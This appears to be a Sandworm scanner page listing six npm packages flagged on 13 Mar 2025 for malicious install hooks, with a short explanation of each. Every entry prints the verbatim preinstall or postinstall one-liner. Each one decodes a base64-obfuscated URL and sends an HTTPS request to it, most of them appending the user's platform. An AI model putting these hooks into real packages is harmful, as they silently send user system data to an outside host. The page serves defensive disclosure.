Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.
Follow our π / Twitter feed for updates.
Detected: 13 Mar 2025
Detected Date: 13 Mar 2025
Affected Install Script: postinstall
Package Source: βοΈ View on Npm
The script makes an HTTPS request to a base64-decoded URL, appending the platform information of the user's system. This can potentially expose sensitive information and be used for malicious purposes such as tracking or further attacks.
Install script:
node -e "require('https').request(Buffer.from('aHR0cHM6Ly93ZWJob29rLXRlc3QuY29tL2JkOGQ1ZmI3NGMxNWRhYmFjYzNiZTliYTQ3Nzg2MGFh', 'base64').toString() + '?os=' + encodeURIComponent(process.platform)).setTimeout(100).on('timeout', () => {}).end()"Detected: 13 Mar 2025
Detected Date: 13 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
This script downloads remote content from a potentially malicious URL based on the operating system and its version, which could lead to executing harmful code. The use of Base64 encoding to obfuscate the URL is a common technique in malicious scripts, aimed at hiding the intent of the code.
Install script:npm install macos-release && node -e "const macosRelease = require('macos-release'); require('https').request(Buffer.from('aHR0cHM6Ly93ZWJob29rLXRlc3QuY29tL2JkOGQ1ZmI3NGMxNWRhYmFjYzNiZTliYTQ3Nzg2MGFh', 'base64').toString() + '?os=' + encodeURIComponent(process.platform) + (process.platform === 'darwin' ? '&version=' + encodeURIComponent(macosRelease().version) : '')).setTimeout(100).on('timeout', () => {}).end()"Detected: 13 Mar 2025
Detected Date: 13 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
This script makes a request to a remote URL, potentially downloading and executing malicious code. The URL is constructed using base64 decoded data that could lead to various risks such as data theft or unauthorized system access.
Install script:npm install macos-release && node -e "require('https').request(Buffer.from('aHR0cHM6Ly93ZWJob29rLXRlc3QuY29tL2JkOGQ1ZmI3NGMxNWRhYmFjYzNiZTliYTQ3Nzg2MGFh', 'base64').toString() + '?os=' + encodeURIComponent(process.platform)).setTimeout(100).on('timeout', () => {}).end()"Detected: 13 Mar 2025
Detected Date: 13 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
This script makes an HTTPS request to a URL that has been encoded in base64, which can potentially lead to downloading or executing malicious code or accessing sensitive information without the user's consent. Since the URL is obfuscated, it can be particularly dangerous as it hides the destination from the user.
Install script:node -e "require('https').request(Buffer.from('aHR0cHM6Ly93ZWJob29rLXRlc3QuY29tL2JkOGQ1ZmI3NGMxNWRhYmFjYzNiZTliYTQ3Nzg2MGFh', 'base64').toString()).setTimeout(100).on('timeout', () => {}).end()"Detected: 13 Mar 2025
Detected Date: 13 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
This script makes an HTTPS request to a URL that is decoded from base64, appending the operating system information of the user. This could potentially expose sensitive information to a remote server, which is a security risk.
Install script:node -e "require('https').request(Buffer.from('aHR0cHM6Ly93ZWJob29rLXRlc3QuY29tL2JkOGQ1ZmI3NGMxNWRhYmFjYzNiZTliYTQ3Nzg2MGFh', 'base64').toString() + '?os=' + encodeURIComponent(process.platform)).setTimeout(100).on('timeout', () => {}).end()"Detected: 13 Mar 2025
Detected Date: 13 Mar 2025
Affected Install Script: postinstall
Package Source: βοΈ View on Npm
The script makes an HTTP request to a URL that is base64 encoded, which could potentially lead to downloading and executing malicious code or exfiltrating data from the system without user consent.
Install script:node -e "require('https').request(Buffer.from('aHR0cHM6Ly93ZWJob29rLXRlc3QuY29tL2JkOGQ1ZmI3NGMxNWRhYmFjYzNiZTliYTQ3Nzg2MGFh', 'base64').toString()).setTimeout(100).on('timeout', () => {}).end()"
